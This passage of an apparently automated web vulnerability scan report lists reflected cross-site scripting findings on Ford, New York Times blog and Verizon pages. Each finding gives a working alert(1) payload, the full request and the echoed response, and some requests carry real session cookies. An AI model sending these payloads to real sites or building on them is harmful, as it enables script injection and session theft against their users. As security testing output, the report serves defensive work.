Date: Sat, 20 Nov 2010 03:59:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1d673b'-alert(1)-'d928b3e9a59',
'Skin':'Trucks',
'Model':'SuperDuty',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.264. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Taurus/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bdb6'-alert(1)-'655e3f619c3 was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Taurus/ChooseYourPath/?branding=11bdb6'-alert(1)-'655e3f619c3&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'11bdb6'-alert(1)-'655e3f619c3',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Taurus',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.265. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Taurus/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6765e'-alert(1)-'5ff644f6de0 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Taurus/ChooseYourPath/?branding=1&referringSite=1&lang=en6765e'-alert(1)-'5ff644f6de0 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en6765e'-alert(1)-'5ff644f6de0',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Taurus',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
...[SNIP]...

2.266. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Taurus/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 896ac'-alert(1)-'806aee0759 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Taurus/ChooseYourPath/?896ac'-alert(1)-'806aee0759=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'896ac'-alert(1)-'806aee0759':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Taurus',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.267. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Taurus/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f21a9'-alert(1)-'19bc6481cfa was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Taurus/ChooseYourPath/?branding=1&referringSite=1f21a9'-alert(1)-'19bc6481cfa&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Sat, 20 Nov 2010 03:55:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1f21a9'-alert(1)-'19bc6481cfa',
'Skin':'Generic',
'Model':'Taurus',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.268. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-TransitConnect/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77ba6'-alert(1)-'8c119c1d672 was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-TransitConnect/ChooseYourPath/?branding=177ba6'-alert(1)-'8c119c1d672&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:54:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'177ba6'-alert(1)-'8c119c1d672',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'TransitConnect',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</s
...[SNIP]...

2.269. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-TransitConnect/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bedf'-alert(1)-'5911369119c was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-TransitConnect/ChooseYourPath/?branding=1&referringSite=1&lang=en1bedf'-alert(1)-'5911369119c HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:58:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en1bedf'-alert(1)-'5911369119c',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'TransitConnect',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed
...[SNIP]...

2.270. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-TransitConnect/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b855e'-alert(1)-'0d366bf33f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-TransitConnect/ChooseYourPath/?b855e'-alert(1)-'0d366bf33f1=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'b855e'-alert(1)-'0d366bf33f1':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'TransitConnect',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.271. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-TransitConnect/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77e50'-alert(1)-'b79825a74d1 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-TransitConnect/ChooseYourPath/?branding=1&referringSite=177e50'-alert(1)-'b79825a74d1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'177e50'-alert(1)-'b79825a74d1',
'Skin':'Generic',
'Model':'TransitConnect',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.272. http://bucks.blogs.nytimes.com/2010/11/19/requiring-brokers-to-put-their-customers-first/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bucks.blogs.nytimes.com
Path:   /2010/11/19/requiring-brokers-to-put-their-customers-first/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f108f"><script>alert(1)</script>773cb5e3643 was submitted in the src parameter. This input was echoed as f108f\"><script>alert(1)</script>773cb5e3643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/requiring-brokers-to-put-their-customers-first/?src=twrf108f"><script>alert(1)</script>773cb5e3643 HTTP/1.1
Host: bucks.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:58:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://bucks.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
l+finance;gay+financial+issues;financial+experts;retirement;social+security;insurance;529+plans;banking;health+costs;taxes;shopping+tactics;bills;save+money.
+;financial-regulation;investments&src=twrf108f\"><script>alert(1)</script>773cb5e3643">
...[SNIP]...

2.273. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/download/tour_playerOct09.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/download/tour_playerOct09.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bda12(a)37e316d8a6b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/download/bda12(a)37e316d8a6b HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 87
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:09:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:09:37 GMT
Connection: close
Set-Cookie: SaasSessionID=YnJcMnKBCy0260ZkQkzqwJPLw02Qs9vg4jnQcQhhV21yy3GJL284!-1644393018; path=/

Resource /SMBPortal/download/bda12(a)37e316d8a6b could not be resolved for locale null.

2.274. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Bitrate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the Bitrate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7212"style%3d"x%3aexpression(alert(1))"7ea533b272 was submitted in the Bitrate parameter. This input was echoed as c7212"style="x:expression(alert(1))"7ea533b272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1611930&Format=flash&Bitrate=300c7212"style%3d"x%3aexpression(alert(1))"7ea533b272&vdoId=1225&isVideoContent=true&portletTitle=Video News&FromHeroTab=video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:05:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:05:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=3sYPMnJK41bLlJScrmWTkhlYpXdNP21JnvsRjn39YHTJCl4DDGSF!-1644393018; path=/
Content-Length: 44702

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
avascript"
           src="http://publish.vx.roo.com/verizonsmb/standard/embed/?vxSiteId=16359446-8e33-4088-821a-293e3bfd9acd&vxTemplate=template3.swf&vxChannel=USA Business&vxClipId=Jpeb1611930&vxBitrate=300c7212"style="x:expression(alert(1))"7ea533b272&vxFormat=flash">
...[SNIP]...

2.275. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Bitrate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the Bitrate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2539"-alert(1)-"b174114f4af was submitted in the Bitrate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1613575&Format=flash&Bitrate=300a2539"-alert(1)-"b174114f4af&vdoId=1226&isVideoContent=true&portletTitle=Video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:10:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:10:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=0t16MnKdG3Lqv3MFVndglJj156vPrfRgdnPRQwvyQ4WmZ2s41XHv!-1644393018; path=/
Content-Length: 80661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...

       document.cookie = "redirect=/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1613575&Format=flash&Bitrate=300a2539"-alert(1)-"b174114f4af&vdoId=1226&isVideoContent=true&portletTitle=Video|; path=/";
   </script>
...[SNIP]...

2.276. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the Channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0c6"style%3d"x%3aexpression(alert(1))"84b307a3ebe was submitted in the Channel parameter. This input was echoed as cd0c6"style="x:expression(alert(1))"84b307a3ebe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Businesscd0c6"style%3d"x%3aexpression(alert(1))"84b307a3ebe&ClipId=Jpeb1613575&Format=flash&Bitrate=300&vdoId=1226&isVideoContent=true&portletTitle=Video News&FromHeroTab=video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
